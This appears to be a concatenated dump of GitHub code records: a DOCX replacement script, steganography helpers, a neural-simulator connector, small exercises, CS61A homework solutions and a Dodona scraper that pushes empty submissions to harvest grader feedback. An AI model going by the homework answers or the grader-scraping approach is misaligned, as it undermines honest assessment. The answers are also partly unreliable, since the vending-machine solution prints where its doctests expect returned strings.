y/n ')\n\tif yn == 'y':\n\t\tt= str(i)\n\t\tprint('Saved'+t)\n\t\tcv2.imwrite('test-R'+t+'.png',frameR) # Save the image in the file where this Programm is located\n\t\tcv2.imwrite('test-L'+t+'.png',frameL)\n\t\ti=i+1\n\telse:\n\t\tprint('canceled')\n\t\n\t\n\n\n\n\n","repo_name":"amisal88/EVC-G3","sub_path":"SLAM/test_colors.py","file_name":"test_colors.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4965931381","text":"#!/usr/bin/env python3\n\nimport json\nimport argparse\nimport tempfile\nimport os\nimport pyperclip\nimport sys\nimport subprocess\nimport re\nimport shutil\nimport xml.sax.saxutils\nfrom pathlib import Path\nfrom os import listdir\nfrom os.path import isfile\nfrom datetime import datetime\n\nif shutil.which('zip') is None:\n raise Exception('zip command not found')\nif shutil.which('unzip') is None:\n raise Exception('unzip command not found')\nparser = argparse.ArgumentParser()\nparser.add_argument('docxfile')\n#parser.add_argument('--old', help='Old text', required=True)\nparser.add_argument('--old', help='Old text to be replaced with clipboard text')\nparser.add_argument('--rep', help='Replacement JSON file mapping to file paths')\nparser.add_argument('--rep-json', help='Replacement JSON file')\nparser.add_argument('--replace-whitespace-with-space', help='Replace whitespace with space', action='store_true')\nparser.add_argument('--generate-pdf', help='Additional PDF generation', action='store_true')\nparser.add_argument('--generate-pdf-with-pandoc', help='Additional PDF generation with pandoc', action='store_true')\nparser.add_argument('--get-pdf-num-of-pages', help='Print PDF number of pages', action='store_true')\nparser.add_argument('--keep-temp-files', help='End the program without deleting temp files', action='store_true')\nnmsce: argparse.Namespace = parser.parse_args()\nrep: str = nmsce.rep\nrep_json: str = nmsce.rep_json\npattern: str = nmsce.old\nreplace_whitespace_with_space: bool = nmsce.replace_whitespace_with_space\ngenerate_pdf: bool = nmsce.generate_pdf\ngenerate_pdf_with_pandoc: bool = nmsce.generate_pdf_with_pandoc\nget_pdf_num_of_pages: bool = nmsce.get_pdf_num_of_pages\nkeep_temp_files: bool = nmsce.keep_temp_files\ndoc_filename: str = nmsce.docxfile\n#print(nmsce)\nif rep is None and rep_json is None and pattern is None:\n raise Exception('At least one option among --rep, --old, and --rep-json need to be specified')\ntmpdir: str = tempfile.gettempdir()\ntmpdir = os.path.join(tmpdir, 'REPLACE_DOCX_TEXT_TMPDIR')\n\n\nif os.path.lexists(tmpdir):\n shutil.rmtree(tmpdir)\nos.makedirs(tmpdir)\ntmpdoc = os.path.join(tmpdir, 'tmp.docx')\ndocxml = os.path.join(tmpdir, 'word/document.xml')\n#if 2!=len(sys.argv):\n# raise Exception('Must provide exactly 1 arg as DOCX filename')\n#scr_filename: str = sys.argv[0]\n#doc_filename: str = sys.argv[1]\nif not doc_filename.lower().endswith('.docx'):\n raise Exception('DOCX filename not ending with .docx')\nif not os.path.isfile(doc_filename):\n raise Exception('DOCX filename not an existing file')\n#pattern: str | None = os.getenv('REPLACE_DOCX_TEXT_OLD')\n#if pattern is None:\n# raise Exception('REPLACE_DOCX_TEXT_OLD not found. 
Environment variable REPLACE_DOCX_TEXT_OLD is required.')\nshutil.copy2(doc_filename, tmpdoc)\nsubprocess.run(['unzip', 'tmp.docx'], cwd=tmpdir, check=True)\nif not os.path.isfile(docxml):\n raise Exception('xml containing text is somehow missing')\ndocxmlpath: Path = Path(docxml)\ndocxmlstr = docxmlpath.read_text()\n\n\nif pattern:\n print('OLD:', pattern)\n substitution: str = pyperclip.paste()\n #if 'true' == os.getenv('REPLACE_DOCX_TEXT_REPLACE_WHITESPACE_WITH_SPACE'):\n if replace_whitespace_with_space:\n substitution = re.sub('\\\\s+', ' ', substitution)\n substitution = xml.sax.saxutils.escape(substitution)\n print('NEW:', substitution)\n docxmlstr = docxmlstr.replace(pattern, substitution)\nif rep_json:\n rep_lst = json.loads(Path(rep_json).read_text())\n for reobj in rep_lst:\n if 'old' in reobj and 'new' in reobj:\n nstr: str = reobj['new']\n print('OLD:', reobj['old'])\n print('NEW:', reobj['new'])\n nstr = xml.sax.saxutils.escape(nstr)\n if 'count' in reobj:\n docxmlstr = docxmlstr.replace(reobj['old'], nstr, reobj['count'])\n else:\n docxmlstr = docxmlstr.replace(reobj['old'], nstr)\nif rep:\n rep_lst = json.loads(Path(rep).read_text())\n for reobj in rep_lst:\n if 'old' in reobj and 'new' in reobj:\n print('OLD:', reobj['old'])\n print('NEW:', reobj['new'])\n nstr: str = Path(reobj['new']).read_text()\n nstr = xml.sax.saxutils.escape(nstr)\n if 'count' in reobj:\n docxmlstr = docxmlstr.replace(reobj['old'], nstr, reobj['count'])\n else:\n docxmlstr = docxmlstr.replace(reobj['old'], nstr)\n\ndocxmlpath.write_text(docxmlstr)\nsubprocess.run(['zip', '-f', 'tmp.docx'], cwd=tmpdir, check=True)\nnewdocx = doc_filename[:-5]+'_new.docx'\nprint('New DOCX:', newdocx)\nshutil.copy2(tmpdoc, newdocx)\nif not keep_temp_files:\n shutil.rmtree(tmpdir)\n#if 'true' == os.getenv('REPLACE_DOCX_TEXT_CONVERT_TO_PDF'):\nif generate_pdf:\n if generate_pdf_with_pandoc and shutil.which('pandoc') and shutil.which('pdflatex'):\n subprocess.run(['pandoc', '-o', newdocx[:-5]+'.pdf', '-f', 'docx', newdocx], check=True, cwd=(os.path.dirname(newdocx) or None))\n elif shutil.which('libreoffice') is None:\n print('libreoffice not found. 
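# --- Added example (hedged sketch) ---
# The script above shells out to zip/unzip; the same word/document.xml rewrite
# can be done with the standard library alone, dropping the external-tool checks:
import zipfile

def replace_in_docx(docx_in, docx_out, old, new):
    with zipfile.ZipFile(docx_in) as zin, \
         zipfile.ZipFile(docx_out, "w", zipfile.ZIP_DEFLATED) as zout:
        for item in zin.infolist():
            data = zin.read(item.filename)
            if item.filename == "word/document.xml":
                data = data.decode("utf-8").replace(old, new).encode("utf-8")
            zout.writestr(item, data)   # every other member is copied unchanged

# replace_in_docx("report.docx", "report_new.docx", "OLD", "NEW")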
PDF not generated.')\n else:\n subprocess.run(['libreoffice', '--headless', '--convert-to', 'pdf', newdocx], check=True, cwd=(os.path.dirname(newdocx) or None))\n dst: str = shutil.move(newdocx[:-5]+'.pdf', doc_filename[:-5]+'.pdf')\n if get_pdf_num_of_pages and shutil.which('pdfinfo'):\n subprocess.run('pdfinfo '+dst+' | grep -- ^Pages', shell=True, check=True)#fixme if dst contains special character this will fail\n#print('DONE')\n","repo_name":"cshu/replace-docx-text","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71173836854","text":"#filemanip.py\nimport numpy as np\nfrom graycode import *\n\n## Methods for converting files to binary arrays and their inverse\n\n# Methods to convert to binary\ndef messageToBinString(message): #May need a string builder, be careful\n\t'''\n\tConvert a string of characters to a binary string\n\t'''\n\ts = \"\"\n\tfor i in range (len(message)):\n\t\ts+=char_to_binary(message[i])\n\treturn s\n\ndef pad(bin_string): #Concatenation again\n\t'''\n\tPad a binary string using #PKCS\n\t'''\n\tpad_required = (64 - len(bin_string) % 64) / 8 \n\tfor i in range(pad_required):\n\t\tbin_string = '{0:08b}'.format(pad_required) + bin_string\n\treturn bin_string\n\ndef char_to_binary(char):\n\t'''\n\tConvert char to binary\n\t'''\n\tx = ord(char)\n\treturn '{0:08b}'.format(x)\n\ndef unpad(bin_string):\n\t'''\n\tUnpad a binary string using #PKCS\n\t'''\n\tpad_count = int(bin_string[0:8],2)\n\t#check padding\n\tfor x in xrange(0, pad_count*8, 8):\n\t\tif(bin_string[x:x+8] != bin_string[0:8]):\n\t\t\treturn bin_string\n\treturn bin_string[pad_count*8: len(bin_string)]\n\ndef binStringtoSquares(bin_string):\n\t'''\n\tConvert binary string into a (8,8,X) matrix\n\t'''\n\tnum_squares = len(bin_string)/64\n\toutput_array = np.zeros((8,8,num_squares), dtype = 'uint8')\n\tcounter = 0\n\tfor i in range (8):\n\t\tfor j in range (8):\n\t\t\tfor k in range (num_squares):\n\t\t\t\toutput_array[i,j,k] = bin_string[counter]\n\t\t\t\tcounter+= 1\n\treturn output_array\n\n# Methods for converting from binary to characters\n\ndef bin_to_char(a):\n\t'''\n\tConvert binary string to character\n\t'''\n\tx=int(a,2)\n\treturn chr(x)\n\ndef binStringtoFile(bin_string):\n\t'''\n\tConvert binary string to character string\n\t'''\n\tbin_string_holder = \"\"\n\tfile = \"\"\n\tfor i in range (len(bin_string)):\n\t\tbin_string_holder += bin_string[i]\n\t\tif((i+1)%8 == 0):\n\t\t\tfile += bin_to_char(bin_string_holder)\n\t\t\tbin_string_holder = \"\"\n\treturn str(file)\n\ndef convert_array_to_bin_string(array):\n\t'''\n\tConvert array to bin strings\n\t'''\n\tbin_string = \"\"\n\tfor i in range (8):\n\t\tfor j in range (8):\n\t\t\tfor k in range (len(array[0,0])): \n\t\t\t\tbin_string += str(array[i,j,k])\n\treturn bin_string","repo_name":"CurtisSHiscock/Bit-Plane-Complexity-Segmentation-Steganography","sub_path":"libs/filemanip.py","file_name":"filemanip.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"46879534324","text":"import unittest\nfrom day_18 import _solve\n\nclass TestSamples(unittest.TestCase):\n def test_sample_part_1(self):\n data = \"\"\".#.#.#\n...##.\n#....#\n..#...\n#.#..#\n####..\"\"\"\n p1 = _solve(data, 4)\n p2 = _solve(data, 5, True)\n self.assertEqual(p1, 4)\n self.assertEqual(p2, 
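# --- Added example (hedged sketch) ---
# filemanip.py above pads a bit string to a 64-bit multiple by prepending the
# pad byte count PKCS#7-style (its pad() uses Python 2 division; Python 3
# needs //). The scheme round-trips like this:
def pad(bits):
    n = (64 - len(bits) % 64) // 8            # pad bytes needed
    return "{0:08b}".format(n) * n + bits

def unpad(bits):
    n = int(bits[:8], 2)
    if all(bits[i:i + 8] == bits[:8] for i in range(0, n * 8, 8)):
        return bits[n * 8:]
    return bits                               # padding malformed: leave as-is

msg = "01000001" * 6                          # six bytes -> two pad bytes
assert len(pad(msg)) % 64 == 0 and unpad(pad(msg)) == msg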
17)\n","repo_name":"vstrimaitis/aoc-2015","sub_path":"test_day_18.py","file_name":"test_day_18.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"15750348510","text":"import numpy\nfrom spynnaker.pyNN.models.neural_projections.connectors import (\n    MultapseConnector as\n    _BaseClass)\n\n\nclass MultapseConnector(_BaseClass):\n    \"\"\"\n    Create a multapse connector. The size of the source and destination\\\n    populations are obtained when the projection is connected. The number of\\\n    synapses is specified. When instantiated, the required number of synapses\\\n    is created by selecting at random from the source and target populations\\\n    with replacement. Uniform selection probability is assumed.\n\n    :param n: This is the total number of synapses in the connection.\n    :type n: int\n    :param allow_self_connections:\n        Bool. Allow a neuron to connect to itself or not.\n    :type allow_self_connections: bool\n    :param with_replacement:\n        Bool. When selecting, allow a neuron to be re-selected or not.\n    :type with_replacement: bool\n    \"\"\"\n    __slots__ = []\n\n    def __init__(self, n, allow_self_connections=True,\n                 with_replacement=True, safe=True, verbose=False,\n                 rng=None):\n        super(MultapseConnector, self).__init__(\n            num_synapses=n, allow_self_connections=allow_self_connections,\n            with_replacement=with_replacement, safe=safe, verbose=verbose,\n            rng=rng)\n\n    def get_rng_next(self, num_synapses, prob_connect):\n        # Below is how numpy does multinomial internally...\n        size = len(prob_connect)\n        multinomial = numpy.zeros(size, int)\n        total = 1.0\n        dn = num_synapses\n        for j in range(0, size - 1):\n            multinomial[j] = self._rng.next(\n                1, distribution=\"binomial\",\n                parameters={'n': dn, 'p': prob_connect[j] / total})\n            dn = dn - multinomial[j]\n            if dn <= 0:\n                break\n            total = total - prob_connect[j]\n        if dn > 0:\n            multinomial[size - 1] = dn\n\n        return multinomial\n","repo_name":"apdavison/sPyNNaker8","sub_path":"spynnaker8/models/connectors/multapse_connector.py","file_name":"multapse_connector.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"}
{"seq_id":"5190745441","text":"class UnexpectedRSPValue(Exception):\n    '''Error raised when the value is not one of scissors, rock, or paper'''\n\nvalue = input('Please enter one of scissors, rock, or paper. > ')\n\ntry:\n    if value not in ['scissors', 'rock', 'paper']:\n        raise UnexpectedRSPValue\nexcept UnexpectedRSPValue:\n    print('An error occurred.')","repo_name":"Ajrdn/Python-practice-","sub_path":"13. 
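# --- Added example (hedged sketch) ---
# get_rng_next() above decomposes a multinomial draw into sequential binomials,
# conditioning each category on what is left. The same trick with numpy's RNG:
import numpy as np

def multinomial_via_binomials(rng, n, p):
    out = np.zeros(len(p), dtype=int)
    total, remaining = 1.0, n
    for j in range(len(p) - 1):
        out[j] = rng.binomial(remaining, min(1.0, p[j] / total))
        remaining -= out[j]
        if remaining <= 0:
            break
        total -= p[j]
    if remaining > 0:
        out[-1] = remaining                    # the last category takes the rest
    return out

draw = multinomial_via_binomials(np.random.default_rng(0), 1000, [0.2, 0.3, 0.5])
assert draw.sum() == 1000 and len(draw) == 3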
Class/exception.py","file_name":"exception.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25004777031","text":"import requests\nimport bs4\nimport re\nimport time\n\nimport post_code\n\n\n# Connect to Dodona an receive the html-code\ndef get_html_code(link: str, token: str):\n response = requests.get(link, headers={'Authorization': token})\n\n soup = bs4.BeautifulSoup(response.content, \"html.parser\")\n # Get all the html-code under the class <div class=\"tab-content\">\n # This contains all \"Correctness\"-tabs and the \"Code\"-tab\n exercise = soup.find(\"div\", {\"class\": \"tab-content\"})\n\n return exercise\n\n\ndef get_ids(link: str) -> tuple:\n course_id = re.findall(r\"/courses/(\\d+)/\", link)[0]\n exercise_id = re.findall(r\"/activities/(\\d+)/\", link)[0]\n\n return course_id, exercise_id\n\n\ndef scraper(dodolink: str, token: str) -> tuple:\n course_id, exercise_id = get_ids(dodolink)\n\n empty_sub = post_code.push(\"empty.txt\", token, course_id, exercise_id)\n new_link = empty_sub[\"url\"][:-5]\n\n html_code = get_html_code(new_link, token)\n\n return html_code, course_id, exercise_id\n\n\ndef get_links(link: str, token: str) -> list[str]:\n substring = \"/courses/\"\n\n response = requests.get(link, headers={\"Authorization\": token})\n soup = bs4.BeautifulSoup(response.text, \"html.parser\")\n\n too_much_links = [link[\"href\"] for link in soup.find_all(\"a\", href=True) if substring in link[\"href\"]]\n\n links = [\"https://dodona.ugent.be\" + link\n for link in too_much_links if \"submissions\" not in link and \"series\" in link]\n\n return links\n","repo_name":"BramWindey/AutoDodona","sub_path":"webscraper.py","file_name":"webscraper.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37502562854","text":"def merge(lst1, lst2):\n \"\"\"Merges two sorted lists.\n\n >>> merge([1, 3, 5], [2, 4, 6])\n [1, 2, 3, 4, 5, 6]\n >>> merge([], [2, 4, 6])\n [2, 4, 6]\n >>> merge([1, 2, 3], [])\n [1, 2, 3]\n >>> merge([5, 7], [2, 4, 6])\n [2, 4, 5, 6, 7]\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n new_list=[]\n def func(lst1,lst2):\n if len(lst1)==0:\n if len(lst2)!=0:\n new_list.append(lst2[0])\n func(lst1,lst2[1:])\n return\n if len(lst2)==0:\n if len(lst1)!=0:\n new_list.append(lst1[0])\n func(lst1[1:],lst2)\n return \n if lst1[0]>lst2[0]:\n new_list.append(lst2[0])\n func(lst1,lst2[1:])\n return\n else:\n new_list.append(lst1[0])\n func(lst1[1:],lst2)\n return\n func(lst1,lst2)\n return new_list\n\nclass Mint:\n \"\"\"A mint creates coins by stamping on years.\n\n The update method sets the mint's stamp to Mint.present_year.\n\n >>> mint = Mint()\n >>> mint.year\n 2021\n >>> dime = mint.create(Dime)\n >>> dime.year\n 2021\n >>> Mint.present_year = 2101 # Time passes\n >>> nickel = mint.create(Nickel)\n >>> nickel.year # The mint has not updated its stamp yet\n 2021\n >>> nickel.worth() # 5 cents + (80 - 50 years)\n 35\n >>> mint.update() # The mint's year is updated to 2101\n >>> Mint.present_year = 2176 # More time passes\n >>> mint.create(Dime).worth() # 10 cents + (75 - 50 years)\n 35\n >>> Mint().create(Dime).worth() # A new mint has the current year\n 10\n >>> dime.worth() # 10 cents + (155 - 50 years)\n 115\n >>> Dime.cents = 20 # Upgrade all dimes!\n >>> dime.worth() # 20 cents + (155 - 50 years)\n 125\n \"\"\"\n present_year = 2021\n def __init__(self):\n 
self.update()\n\n def create(self, coin):\n \"*** YOUR CODE HERE ***\"\n return coin(self.year)\n\n def update(self):\n \"*** YOUR CODE HERE ***\"\n self.year=Mint.present_year\n\n\nclass Coin:\n cents = None # will be provided by subclasses, but not by Coin itself\n\n def __init__(self, year):\n self.year = year\n\n def worth(self):\n \"*** YOUR CODE HERE ***\"\n temp=Mint.present_year-self.year-50\n if temp>0:\n return self.cents+temp\n else:\n return self.cents\n\n\nclass Nickel(Coin):\n cents = 5\n\n\nclass Dime(Coin):\n cents = 10\n\n\nclass VendingMachine:\n \"\"\"A vending machine that vends some product for some price.\n\n >>> v = VendingMachine('candy', 10)\n >>> v.vend()\n 'Nothing left to vend. Please restock.'\n >>> v.add_funds(15)\n 'Nothing left to vend. Please restock. Here is your $15.'\n >>> v.restock(2)\n 'Current candy stock: 2'\n >>> v.vend()\n 'You must add $10 more funds.'\n >>> v.add_funds(7)\n 'Current balance: $7'\n >>> v.vend()\n 'You must add $3 more funds.'\n >>> v.add_funds(5)\n 'Current balance: $12'\n >>> v.vend()\n 'Here is your candy and $2 change.'\n >>> v.add_funds(10)\n 'Current balance: $10'\n >>> v.vend()\n 'Here is your candy.'\n >>> v.add_funds(15)\n 'Nothing left to vend. Please restock. Here is your $15.'\n \n >>> w = VendingMachine('soda', 2)\n >>> w.restock(3)\n 'Current soda stock: 3'\n >>> w.restock(3)\n 'Current soda stock: 6'\n >>> w.add_funds(2)\n 'Current balance: $2'\n >>> w.vend()\n 'Here is your soda.'\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n num=0\n funds=0\n def __init__(self,name,price):\n self.name=name\n self.price=price\n def vend(self):\n if self.num>0:\n if self.funds>self.price:\n self.num-=1\n self.funds-=self.price\n print(\"'Here is your %s and $%d change.'\"%(self.name,self.funds))\n self.funds=0\n elif self.funds==self.price:\n self.num-=1\n self.funds-=self.price\n print(\"'Here is your %s.'\"%(self.name))\n self.funds=0\n else:\n print (\"'You must add $%d more funds.'\"%(self.price-self.funds))\n else:\n print(\"'Nothing left to vend. Please restock.'\")\n def add_funds(self,money):\n self.funds+=money\n if self.num==0:\n print(\"'Nothing left to vend. Please restock. Here is your $%d.'\"%(self.funds))\n self.funds=0\n else:\n print(\"'Current balance: $%d'\"%(self.funds))\n def restock(self,number):\n self.num+=number\n print (\"'Current %s stock: %d'\"%(self.name,self.num))\n\n\n","repo_name":"SunTianTian2333/cs61a","sub_path":"hw04/hw04.py","file_name":"hw04.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10867487506","text":"class Node:\n def __init__(self, d):\n self.data = d\n self.next = None\n\n def insertWithTail(self, d):\n self.next = Node(d)\n return self.next\n\n# Key Points/Assumptions:\n'''\n1. Lengths are not same\n2. Singly lists\n'''\n\n# Algorithm:\n'''\n1. Brute force\n2. Pick the first node from 1st list and search in another list\n3. If found intersection is there else not.\n'''\n\n# Example:\n'''\n1. 
1->2->3->4\n             => 7->8->9\n   4->5->6\n'''\n\ndef findIntersection(head1, head2):\n    cur1 = head1\n\n    while cur1 is not None:\n        cur2 = head2\n        while cur2 is not None:\n            # compare node identity, not node values\n            if cur2 is cur1:\n                return cur1\n            cur2 = cur2.next\n\n        cur1 = cur1.next\n\n    return None\n\nhead1 = Node(9)\ntail = head1.insertWithTail(7).insertWithTail(9)\n\nhead2 = Node(8)\nhead2.insertWithTail(10).insertWithTail(8).insertWithTail(1123).next = tail\n\ntail.insertWithTail(7).insertWithTail(9)\n","repo_name":"purnesh42H/Algorithm-Problems","sub_path":"LinkedList/findIntersection.py","file_name":"findIntersection.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"42703559405","text":"def eh_primo(p):\n    if p < 2:\n        return False\n    if p == 2:\n        return True\n    if p % 2 == 0:\n        return False\n    i = 3\n    while i < p:\n        if p % i == 0:\n            return False\n        i += 2\n    return True\ndef primos_entre(a, b):\n    # print the primes strictly between a and b (exclusive)\n    f = a + 1\n    while f < b:\n        if eh_primo(f):\n            print(f)\n        f += 1\n","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_061/ch38_2019_03_16_15_11_31_961560.py","file_name":"ch38_2019_03_16_15_11_31_961560.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"393219129","text":"#coding:utf-8\r\nimport wsgiref.handlers\r\nimport os\r\nfrom functools import wraps\r\nfrom google.appengine.ext import webapp\r\nfrom google.appengine.ext.webapp import template\r\nfrom google.appengine.api import users\r\nimport methods,logging\r\nfrom django.utils import simplejson\r\n\r\nimport urllib\r\nimport CloudFetch\r\nfrom models import Images\r\n\r\n\r\nclass AdminControl(webapp.RequestHandler):\r\n    def render(self,template_file,template_value):\r\n        path=os.path.join(os.path.dirname(__file__),template_file)\r\n        self.response.out.write(template.render(path, template_value))\r\n    def returnjson(self,dit):\r\n        self.response.headers['Content-Type'] = \"application/json\"\r\n        self.response.out.write(simplejson.dumps(dit))\r\ndef requires_admin(method):\r\n    @wraps(method)\r\n    def wrapper(self, *args, **kwargs):\r\n        user = users.get_current_user()\r\n        if not user:\r\n            self.redirect(users.create_login_url(self.request.uri))\r\n            return\r\n        elif not users.is_current_user_admin():\r\n            return self.error(403)\r\n        else:\r\n            return method(self, *args, **kwargs)\r\n    return wrapper\r\n\r\nclass Admin_Upload(AdminControl):\r\n    def get(self):\r\n        self.render('views/upload.html', {})\r\n\r\n    def post(self):\r\n        bf=self.request.get(\"file\")\r\n        if not bf:\r\n            return self.redirect('/admin/upload/')\r\n        name=self.request.body_file.vars['file'].filename\r\n        mime = self.request.body_file.vars['file'].headers['content-type']\r\n        if mime.find('image')==-1:\r\n            return self.redirect('/admin/upload/')\r\n        description=self.request.get(\"description\")\r\n        image=methods.addImage(mime, description, bf, name)\r\n\r\n        self.redirect('/show/%s/' % image.id)\r\n\r\nclass Admin_Upload2(AdminControl):\r\n    def get(self):\r\n        self.render('views/upload2.html', {})\r\n\r\n    def post(self):\r\n        dit={\"result\":\"error\"}\r\n        bf=self.request.get(\"Filedata\")\r\n        if not bf:\r\n            return self.returnjson(dit)\r\n        image=methods.addImage2(bf)\r\n        if not image:\r\n            return self.returnjson(dit)\r\n        dit[\"result\"]=\"ok\"\r\n        dit[\"id\"]=image.id\r\n        return self.returnjson(dit)\r\n#TODO: 1. CHECK OF DUPLICATE, 2. ADD MULTIPLE BUTTONS?, 3. 
MODIFY UI, DELETE ABOUT....\r\n\r\nclass CloudPolling(AdminControl):\r\n    def get(self):\r\n        collector = CloudFetch.CloudFetch()\r\n        urllist = collector.getUrlList()\r\n        #url = 'http://www.technobuffalo.com/wp-content/uploads/2012/12/Google-Apps.jpeg'\r\n        #urllist = urllist.append(url)\r\n        images = Images.all()\r\n        for url in urllist:\r\n            bf = urllib.urlopen(url).read()\r\n            #bf=self.request.get(\"file\")\r\n            if not bf:\r\n                return self.redirect('/')\r\n            #name=self.request.body_file.vars['file'].filename\r\n            #mime = self.request.body_file.vars['file'].headers['content-type']\r\n            #if mime.find('image')==-1:\r\n            #    return self.redirect('/admin/upload/')\r\n            #description=self.request.get(\"description\")\r\n            mime = 'image'\r\n            description = 'Fetched From Cloud'\r\n            name = url.split('/')[-1]\r\n            #DETECT DUPLICATE\r\n            flag = False\r\n            for i in images:\r\n                if(i.name == name):\r\n                    flag = True\r\n                    break\r\n            if(flag == True):\r\n                continue\r\n            image=methods.addImage(mime, description, bf, name)\r\n        self.redirect('/')\r\n\r\nclass Delete_Image(AdminControl):\r\n    @requires_admin\r\n    def get(self,key):\r\n        methods.delImage(key)\r\n        self.redirect('/')\r\n\r\ndef main():\r\n    application = webapp.WSGIApplication(\r\n        [(r'/admin/upload/', Admin_Upload),\r\n         (r'/admin/upload2/', Admin_Upload2),\r\n         (r'/admin/del/(?P<key>[a-z,A-Z,0-9]+)', Delete_Image),\r\n         (r'/admin/cloudfetch/', CloudPolling)\r\n        ], debug=True)\r\n    wsgiref.handlers.CGIHandler().run(application)\r\n\r\nif __name__ == \"__main__\":\r\n    main()","repo_name":"msallk/photocollector","sub_path":"admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"21503335762","text":"#from IPython.display import clear_output\r\nimport random\r\n#ALL FUNCTIONS REQUIRED BY THE CODE\r\n\r\n#To display the current state of the board\r\ndef display_board(board):\r\n    #clear_output()\r\n    print(board[1]+' | ' + board[2] +' | '+ board[3])\r\n    print(\"---------\")\r\n    print(board[4]+' | ' + board[5] +' | '+ board[6])\r\n    print(\"---------\")\r\n    print(board[7]+' | ' + board[8] +' | '+ board[9])\r\n\r\n\r\n#To let player 1 choose X or O as a marker\r\ndef player_input():\r\n    marker=''\r\n    while not(marker == 'X' or marker == 'O'):\r\n        marker= input(\"player 1 make your choice in X and O:\").upper()\r\n\r\n    if marker=='X':\r\n        return ('X','O')\r\n    else:\r\n        return('O','X')\r\n\r\n\r\n#To place the marker at the notified position\r\ndef place_marker(board,marker,position):\r\n    board[position]=marker\r\n\r\n\r\n#To check all the rows, columns and diagonals for a win condition\r\ndef win_check(board,mark):\r\n    return ((board[1]==mark and board[2]==mark and board[3]==mark)or\r\n            (board[4]==mark and board[5]==mark and board[6]==mark)or\r\n            (board[7]==mark and board[8]==mark and board[9]==mark)or\r\n            (board[1]==mark and board[4]==mark and board[7]==mark)or\r\n            (board[2]==mark and board[5]==mark and board[8]==mark)or\r\n            (board[3]==mark and board[6]==mark and board[9]==mark)or\r\n            (board[1]==mark and board[5]==mark and board[9]==mark)or\r\n            (board[7]==mark and board[5]==mark and board[3]==mark))\r\n\r\n\r\n#To randomly choose which player starts the game\r\ndef choose_first():\r\n\r\n    if random.randint(0,1) == 0:\r\n        return 'player1'\r\n    else:\r\n        return 'player2'\r\n\r\n\r\n#To check if the chosen position is empty or not\r\ndef space_check(board,position):\r\n    return board[position]==' '\r\n\r\n\r\n#To check for the Tie condition\r\ndef full_board_check(board):\r\n    for i in range(1,10):\r\n        if space_check(board,i):\r\n            return False\r\n    return True\r\n\r\n#player's choice of 
position to place the marker\r\ndef player_choice(board):\r\n position = 0\r\n num=[1,2,3,4,5,6,7,8,9]\r\n\r\n while position not in num or not space_check(board,position):\r\n position = int(input(\"enter your choice of positon within 1-9 bro:\"))\r\n\r\n return position\r\n\r\n\r\n#To play again \r\ndef replay():\r\n decision = input(\"Would you like to play the game again : y or n\").lower()\r\n return decision=='y'\r\n\r\n\r\n#ACTUAL CODE FOR THE GAME STARTS HERE\r\n\r\n#Initial while loop for the replay of game\r\nprint(\"Welcome to Tic Tac Toe Game\")\r\nwhile True:\r\n #setting up the game\r\n myboard=[' ',' ',' ',' ',' ',' ',' ',' ',' ',' ']\r\n display_board(myboard)\r\n player1_marker,player2_marker = player_input()\r\n turn=choose_first()\r\n print(turn+\" will go first.\")\r\n game = input(\"would you like to start the game: y or n\").lower()\r\n if game=='y':\r\n game_on = True\r\n else:\r\n game_on = False\r\n while game_on:\r\n #PLAYER ONE\r\n if turn == 'player1':\r\n display_board(myboard)\r\n #select position\r\n position=player_choice(myboard)\r\n #place mark in the position\r\n place_marker(myboard,player1_marker,position)\r\n #check win condition\r\n if win_check(myboard,player1_marker):\r\n display_board(myboard)\r\n print(\"PLAYER ONE IS THE WINNER\")\r\n game_on=False\r\n #check Tie condition\r\n else:\r\n if full_board_check(myboard):\r\n display_board(myboard)\r\n print(\"The Game is a Tie\")\r\n game_on=False\r\n \r\n #no Tie then select next player\r\n else:\r\n turn='player2'\r\n \r\n #PLAYER TWO\r\n else: \r\n display_board(myboard)\r\n #select position\r\n position=player_choice(myboard)\r\n #place mark in the position\r\n place_marker(myboard,player2_marker,position)\r\n #check win condition\r\n if win_check(myboard,player2_marker):\r\n display_board(myboard)\r\n print(\"PLAYER TWO IS THE WINNER\")\r\n game_on=False\r\n #check Tie condition\r\n else:\r\n if full_board_check(myboard):\r\n display_board(myboard)\r\n print(\"The Game is a Tie\")\r\n game_on=False\r\n \r\n #no Tie then select next player\r\n else:\r\n turn='player1'\r\n \r\n#end of loop\r\n if not replay():\r\n print(\"Thank You for Playing My Game Dude!\")\r\n break\r\n \r\n\r\n \r\n","repo_name":"ibrahimkhan521/python_examples","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":4494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73360519412","text":"n = int(input(\"Enter a number:\"))\n\nsed = 0\nsod = 0\n\nwhile n > 0:\n r = n % 10\n if r % 2 == 0:\n sed = sed + r\n else:\n sod = sod + r\n n = int(n / 